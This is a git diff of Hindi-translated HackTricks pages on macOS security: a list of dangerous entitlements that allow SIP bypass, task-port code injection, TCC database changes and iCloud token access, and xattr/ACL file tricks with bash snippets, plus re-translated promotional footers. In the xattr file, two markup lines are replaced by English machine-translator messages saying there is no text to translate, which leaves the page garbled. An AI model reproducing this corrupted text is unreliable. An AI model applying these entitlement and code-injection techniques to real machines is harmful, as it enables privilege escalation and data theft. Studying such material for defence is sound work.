-BTM के बारे में **अधिक जानकारी और संदर्भ**:
+संदर्भ और **BTM के बारे में अधिक जानकारी**:

 * [https://youtu.be/9hjUmT031tc?t=26481](https://youtu.be/9hjUmT031tc?t=26481)
 * [https://www.patreon.com/posts/new-developer-77420730?l=fr](https://www.patreon.com/posts/new-developer-77420730?l=fr)
@ -121,12 +142,14 @@ BTM के बारे में **अधिक जानकारी और

 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>

-* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एकल [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
-* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
-* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
-* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को**।
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
+* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) को **फॉलो करें**।
+* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।

 </details>
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md
@ -2,74 +2,76 @@

 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>

-* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सदस्यता योजनाओं**](https://github.com/sponsors/carlospolop) की जाँच करें!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
 * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
-* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram समूह**](https://t.me/peass) या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
-* **अपनी हैकिंग ट्रिक्स साझा करें, [**hacktricks repo**](https://github.com/carlospolop/hacktricks) और [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके.**
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें**.
+* **अपनी हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.

 </details>

 {% hint style="warning" %}
-ध्यान दें कि **`com.apple`** से शुरू होने वाले अधिकार (entitlements) तीसरे पक्ष को उपलब्ध नहीं हैं, केवल Apple उन्हें अनुदान दे सकता है।
+ध्यान दें कि **`com.apple`** से शुरू होने वाले अधिकार (entitlements) तीसरे पक्ष को उपलब्ध नहीं हैं, केवल Apple उन्हें प्रदान कर सकता है.
 {% endhint %}

 ## उच्च

 ### `com.apple.rootless.install.heritable`

-अधिकार **`com.apple.rootless.install.heritable`** SIP को **बायपास** करने की अनुमति देता है। [इसे अधिक जानकारी के लिए देखें](macos-sip.md#com.apple.rootless.install.heritable).
+अधिकार **`com.apple.rootless.install.heritable`** SIP को **बायपास** करने की अनुमति देता है. [इसे अधिक जानकारी के लिए देखें](macos-sip.md#com.apple.rootless.install.heritable).

 ### **`com.apple.rootless.install`**

-अधिकार **`com.apple.rootless.install`** SIP को **बायपास** करने की अनुमति देता है। [इसे अधिक जानकारी के लिए देखें](macos-sip.md#com.apple.rootless.install).
+अधिकार **`com.apple.rootless.install`** SIP को **बायपास** करने की अनुमति देता है. [इसे अधिक जानकारी के लिए देखें](macos-sip.md#com.apple.rootless.install).

 ### **`com.apple.system-task-ports` (पहले `task_for_pid-allow` कहा जाता था)**

-यह अधिकार किसी भी प्रक्रिया के लिए **task port प्राप्त करने** की अनुमति देता है, कर्नेल को छोड़कर। [**इसे अधिक जानकारी के लिए देखें**](../mac-os-architecture/macos-ipc-inter-process-communication/).
+यह अधिकार किसी भी प्रक्रिया के **task port प्राप्त करने** की अनुमति देता है, कर्नेल को छोड़कर. [**इसे अधिक जानकारी के लिए देखें**](../mac-os-architecture/macos-ipc-inter-process-communication/).

 ### `com.apple.security.get-task-allow`

-यह अधिकार अन्य प्रक्रियाओं को जिनके पास **`com.apple.security.cs.debugger`** अधिकार है, उस प्रक्रिया के task port को प्राप्त करने और **उस पर कोड इंजेक्ट करने** की अनुमति देता है जिसे इस अधिकार के साथ बाइनरी द्वारा चलाया जाता है। [**इसे अधिक जानकारी के लिए देखें**](../mac-os-architecture/macos-ipc-inter-process-communication/).
+यह अधिकार अन्य प्रक्रियाओं को **`com.apple.security.cs.debugger`** अधिकार के साथ इस अधिकार वाले बाइनरी द्वारा चलाई गई प्रक्रिया का task port प्राप्त करने और **कोड इंजेक्ट करने** की अनुमति देता है. [**इसे अधिक जानकारी के लिए देखें**](../mac-os-architecture/macos-ipc-inter-process-communication/).

 ### `com.apple.security.cs.debugger`

-डिबगिंग टूल अधिकार के साथ ऐप्स `task_for_pid()` को कॉल कर सकते हैं ताकि वे अनसाइन्ड और तीसरे पक्ष के ऐप्स के लिए एक वैध task port प्राप्त कर सकें जिनके पास `Get Task Allow` अधिकार `true` पर सेट है। हालांकि, डिबगिंग टूल अधिकार के साथ भी, एक डिबगर **task ports प्राप्त नहीं कर सकता** उन प्रक्रियाओं के जिनके पास `Get Task Allow` अधिकार **नहीं है**, और जो इसलिए System Integrity Protection द्वारा संरक्षित हैं। [**इसे अधिक जानकारी के लिए देखें**](https://developer.apple.com/documentation/bundleresources/entitlements/com\_apple\_security\_cs\_debugger).
+डिबगिंग टूल अधिकार वाले ऐप्स `task_for_pid()` को कॉल कर सकते हैं ताकि वे अनसाइन्ड और तीसरे पक्ष के ऐप्स के लिए एक वैध task port प्राप्त कर सकें जिनके पास `Get Task Allow` अधिकार `true` पर सेट है. हालांकि, डिबगिंग टूल अधिकार के साथ भी, एक डिबगर **task ports प्राप्त नहीं कर सकता** उन प्रक्रियाओं के जिनके पास `Get Task Allow` अधिकार **नहीं है**, और जो इसलिए System Integrity Protection द्वारा संरक्षित हैं. [**इसे अधिक जानकारी के लिए देखें**](https://developer.apple.com/documentation/bundleresources/entitlements/com\_apple\_security\_cs\_debugger).

 ### `com.apple.security.cs.disable-library-validation`

-यह अधिकार **Apple द्वारा साइन किए गए या मुख्य निष्पादन योग्य के समान Team ID के साथ साइन किए गए बिना फ्रेमवर्क, प्लग-इन्स, या लाइब्रेरीज को लोड करने** की अनुमति देता है, इसलिए एक हमलावर किसी मनमानी लाइब्रेरी लोड का दुरुपयोग करके कोड इंजेक्ट कर सकता है। [**इसे अधिक जानकारी के लिए देखें**](https://developer.apple.com/documentation/bundleresources/entitlements/com\_apple\_security\_cs\_disable-library-validation).
+यह अधिकार **Apple द्वारा साइन किए गए या मुख्य एक्जीक्यूटेबल के साथ समान Team ID से साइन किए गए बिना फ्रेमवर्क, प्लग-इन्स, या लाइब्रेरीज को लोड करने** की अनुमति देता है, इसलिए एक हमलावर किसी मनमानी लाइब्रेरी लोड का दुरुपयोग करके कोड इंजेक्ट कर सकता है. [**इसे अधिक जानकारी के लिए देखें**](https://developer.apple.com/documentation/bundleresources/entitlements/com\_apple\_security\_cs\_disable-library-validation).

 ### `com.apple.private.security.clear-library-validation`

-यह अधिकार **`com.apple.security.cs.disable-library-validation`** के समान है लेकिन **इसके बजाय** लाइब्रेरी वैलिडेशन को **सीधे अक्षम करने** के बजाय, यह प्रक्रिया को **`csops` सिस्टम कॉल करने की अनुमति देता है ताकि वह इसे अक्षम कर सके**।\
+यह अधिकार **`com.apple.security.cs.disable-library-validation`** के समान है लेकिन **इसके बजाय** लाइब्रेरी वैलिडेशन को **सीधे अक्षम करने** के बजाय, यह प्रक्रिया को **`csops` सिस्टम कॉल करने की अनुमति देता है ताकि इसे अक्षम किया जा सके**.\
 [**इसे अधिक जानकारी के लिए देखें**](https://theevilbit.github.io/posts/com.apple.private.security.clear-library-validation/).

 ### `com.apple.security.cs.allow-dyld-environment-variables`

-यह अधिकार **DYLD पर्यावरण चर (environment variables) का उपयोग करने** की अनुमति देता है जिसका उपयोग लाइब्रेरीज और कोड इंजेक्ट करने के लिए किया जा सकता है। [**इसे अधिक जानकारी के लिए देखें**](https://developer.apple.com/documentation/bundleresources/entitlements/com\_apple\_security\_cs\_allow-dyld-environment-variables).
+यह अधिकार **DYLD पर्यावरण चर का उपयोग करने** की अनुमति देता है जिसका उपयोग लाइब्रेरीज और कोड इंजेक्ट करने के लिए किया जा सकता है. [**इसे अधिक जानकारी के लिए देखें**](https://developer.apple.com/documentation/bundleresources/entitlements/com\_apple\_security\_cs\_allow-dyld-environment-variables).

 ### `com.apple.private.tcc.manager` या `com.apple.rootless.storage`.`TCC`

-[**इस ब्लॉग के अनुसार**](https://objective-see.org/blog/blog\_0x4C.html) **और** [**इस ब्लॉग के अनुसार**](https://wojciechregula.blog/post/play-the-music-and-bypass-tcc-aka-cve-2020-29621/), ये अधिकार **TCC** डेटाबेस को **संशोधित करने** की अनुमति देते हैं।
+[**इस ब्लॉग के अनुसार**](https://objective-see.org/blog/blog\_0x4C.html) **और** [**इस ब्लॉग के अनुसार**](https://wojciechregula.blog/post/play-the-music-and-bypass-tcc-aka-cve-2020-29621/), ये अधिकार **TCC** डेटाबेस को **संशोधित करने** की अनुमति देते हैं.

 ### **`system.install.apple-software`** और **`system.install.apple-software.standar-user`**

-ये अधिकार **बिना अनुमति मांगे सॉफ्टवेयर इंस्टॉल करने** की अनुमति देते हैं, जो **विशेषाधिकार वृद्धि (privilege escalation)** के लिए सहायक हो सकता है।
+ये अधिकार **बिना अनुमति मांगे सॉफ्टवेयर इंस्टॉल करने** की अनुमति देते हैं, जो **विशेषाधिकार वृद्धि (privilege escalation)** के लिए सहायक हो सकता है.

 ### `com.apple.private.security.kext-management`

-अधिकार जो **कर्नेल से कर्नेल एक्सटेंशन लोड करने के लिए कहने** की आवश्यकता होती है।
+कर्नेल से कर्नेल एक्सटेंशन लोड करने के लिए आवश्यक अधिकार.

 ### **`com.apple.private.icloud-account-access`**

-अधिकार **`com.apple.private.icloud-account-access`** के साथ संभव है **`com.apple.iCloudHelper`** XPC सेवा के साथ संवाद करना जो **iCloud टोकन प्रदान करेगी**।
+अधिकार **`com.apple.private.icloud-account-access`** के साथ संभव है **`com.apple.iCloudHelper`** XPC सेवा के साथ संवाद करना जो **iCloud टोकन प्रदान करेगी**.

-**iMovie** और **Garageband** में यह अधिकार था।
+**iMovie** और **Garageband** में यह अधिकार था.

-उस अधिकार से **iCloud टोकन प्राप्त करने के लिए एक्सप्लॉइट के बारे में अधिक जानकारी** के लिए टॉक देखें: [**#OBTS v5.0: "What Happens on your Mac, Stays on Apple's iCloud?!" - Wojciech Regula**](https://www.youtube.com/watch?v=\_6e2LhmxVc0)
+उस अधिकार से **iCloud टोकन प्राप्त करने** के लिए एक्सप्लॉइट के बारे में अधिक **जानकारी** के लिए टॉक देखें: [**#OBTS v5.0: "What Happens on your Mac, Stays on Apple's iCloud?!" - Wojciech Regula**](https://www.youtube.com/watch?v=\_6e2LhmxVc0)

 ### `com.apple.private.tcc.manager.check-by-audit-token`

@ -77,15 +79,15 @@ TODO: मुझे नहीं पता कि यह क्या करन

 ### `com.apple.private.apfs.revert-to-snapshot`

-TODO: [**इस रिपोर्ट में**](https://jhftss.github.io/The-Nightmare-of-Apple-OTA-Update/) **उल्लेख किया गया है कि इसका उपयोग SSV-संरक्षित सामग्री को रिबूट के बाद अपडेट करने के लिए किया जा सकता है। अगर आपको पता है तो कृपया PR भेजें!**
+TODO: [**इस रिपोर्ट में**](https://jhftss.github.io/The-Nightmare-of-Apple-OTA-Update/) **उल्लेख किया गया है कि इसका उपयोग SSV-संरक्षित सामग्री को रिबूट के बाद अपडेट करने के लिए किया जा सकता है**. यदि आप जानते हैं कि यह कैसे करें तो कृपया PR भेजें!

 ### `com.apple.private.apfs.create-sealed-snapshot`

-TODO: [**इस रिपोर्ट में**](https://jhftss.github.io/The-Nightmare-of-Apple-OTA-Update/) **उल्लेख किया गया है कि इसका उपयोग SSV-संरक्षित सामग्री को रिबूट के बाद अपडेट करने के लिए किया जा सकता है। अगर आपको पता है तो कृपया PR भेजें!**
+TODO: [**इस रिपोर्ट में**](https://jhftss.github.io/The-Nightmare-of-Apple-OTA-Update/) **उल्लेख किया गया है कि इसका उपयोग SSV-संरक्षित सामग्री को रिबूट के बाद अपडेट करने के लिए किया जा सकता है**. यदि आप जानते हैं कि यह कैसे करें तो कृपया PR भेजें!

 ### `keychain-access-groups`

-यह अधिकार सूचीबद्ध करता है **keychain** समूह जिन तक एप्लिकेशन की पहुँच है:
+इस अधिकार में उन **keychain** समूहों की सूची होती है जिन तक एप्लिकेशन की पहुँच होती है:
 ```xml
 <key>keychain-access-groups</key>
 <array>
@ -102,9 +104,9 @@ TODO: [**इस रिपोर्ट में**](https://jhftss.github.io/The-

 ### **`kTCCServiceAppleEvents`**

-ऐप को अन्य एप्लिकेशन्स को इवेंट्स भेजने की अनुमति देता है जो आमतौर पर **कार्यों को स्वचालित करने** के लिए उपयोग किए जाते हैं। अन्य एप्स को नियंत्रित करते हुए, यह उन एप्लिकेशन्स को दी गई अनुमतियों का दुरुपयोग कर सकता है।
+ऐप को अन्य एप्लिकेशन्स को इवेंट्स भेजने की अनुमति देता है जो आमतौर पर **कार्यों को स्वचालित करने** के लिए उपयोग किए जाते हैं। अन्य एप्स को नियंत्रित करके, यह उन एप्स को दी गई अनुमतियों का दुरुपयोग कर सकता है।

-जैसे कि उन्हें उपयोगकर्ता से उसका पासवर्ड मांगने के लिए बनाना:
+जैसे कि उन्हें उपयोगकर्ता से उसका पासवर्ड मांगने के लिए कहना:

 {% code overflow="wrap" %}
 ```bash
@ -132,7 +134,7 @@ _सिस्टम सेटिंग्स_ > _प्राइवेसी &

 ### `kTCCServiceAccessibility`

-प्रक्रिया macOS की एक्सेसिबिलिटी सुविधाओं का **दुरुपयोग कर सकेगी**, जिसका मतलब है कि उदाहरण के लिए वह कीस्ट्रोक्स दबा सकेगा। इसलिए वह Finder जैसे ऐप को नियंत्रित करने के लिए एक्सेस का अनुरोध कर सकता है और इस अनुमति के साथ डायलॉग को मंजूरी दे सकता है।
+प्रक्रिया macOS एक्सेसिबिलिटी फीचर्स का **दुरुपयोग कर सकेगी**, जिसका मतलब है कि उदाहरण के लिए वह कीस्ट्रोक्स दबा सकेगी। इसलिए वह Finder जैसे ऐप को कंट्रोल करने के लिए एक्सेस का अनुरोध कर सकता है और इस अनुमति के साथ डायलॉग को मंजूरी दे सकता है।

 ## मध्यम

@ -153,7 +155,7 @@ _सिस्टम सेटिंग्स_ > _प्राइवेसी &
 यह अनुमति अपनी खुद की निष्पादन योग्य फाइलों के खंडों को **संशोधित करने** की अनुमति देती है ताकि जबरन बाहर निकल सकें। [**इसके लिए अधिक जानकारी**](https://developer.apple.com/documentation/bundleresources/entitlements/com\_apple\_security\_cs\_disable-executable-page-protection) देखें।

 {% hint style="danger" %}
-निष्पादन योग्य मेमोरी सुरक्षा अनुमति को निष्क्रिय करना एक अत्यंत अनुमति है जो आपके ऐप से एक मौलिक सुरक्षा संरक्षण को हटाता है, जिससे एक हमलावर के लिए आपके ऐप के निष्पादन योग्य कोड को बिना पता लगाए पुनर्लेखन करना संभव हो जाता है। यदि संभव हो तो संकीर्ण अनुमतियों को प्राथमिकता दें।
+निष्पादन योग्य मेमोरी सुरक्षा अनुमति को निष्क्रिय करना एक अत्यंत अनुमति है जो आपके ऐप से एक मौलिक सुरक्षा सुरक्षा को हटाता है, जिससे एक हमलावर के लिए आपके ऐप के निष्पादन योग्य कोड को बिना पता लगाए फिर से लिखना संभव हो जाता है। संभव हो तो संकीर्ण अनुमतियों को प्राथमिकता दें।
 {% endhint %}

 ### `com.apple.security.cs.allow-relative-library-loads`
@ -179,12 +181,14 @@ TODO

 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें</strong></summary>

-* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सदस्यता योजनाओं**](https://github.com/sponsors/carlospolop) की जाँच करें!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सदस्यता योजनाओं**](https://github.com/sponsors/carlospolop) की जाँच करें!
 * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
-* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
-* **अपनी हैकिंग ट्रिक्स साझा करें, hacktricks repo** में PRs सबमिट करके और [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) में।
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में शामिल हों या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।

 </details>
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md
@ -2,13 +2,15 @@

 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong> AWS हैकिंग सीखें शून्य से लेकर हीरो तक </strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>

-* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
-* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
-* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
-* **अपने हैकिंग ट्रिक्स को** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके साझा करें।**
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
+* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर **मुझे फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।

 </details>
 ```bash
@ -65,7 +67,7 @@ acl_free(acl_text);
 return 0;
 }
 ```
-</details>
+Since you haven't provided any English text to translate, I'm unable to proceed with a translation. Please provide the specific content you want translated into Hindi, and I'll be happy to assist you.
 ```bash
 # Lets add the xattr com.apple.xxx.xxxx with the acls
 mkdir start
@ -175,7 +177,7 @@ zip -r protected.zip protected ._protected
 rm -rf protected
 rm ._*
 ```
-{% endcode %}
+Since the provided text does not contain any English content to translate, there is nothing to translate into Hindi. The text is a closing tag for a code block in markdown syntax. If you have any actual content that needs translation, please provide it, and I'll be happy to assist.
 ```bash
 # Check if it worked
 ditto -x -k --rsrc protected.zip .
@ -183,12 +185,14 @@ xattr -l protected
 ```
 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>

-* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
-* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
-* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
-* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को।**
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
+* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
+* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर **मुझे फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।

 </details>
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md
@ -4,11 +4,11 @@

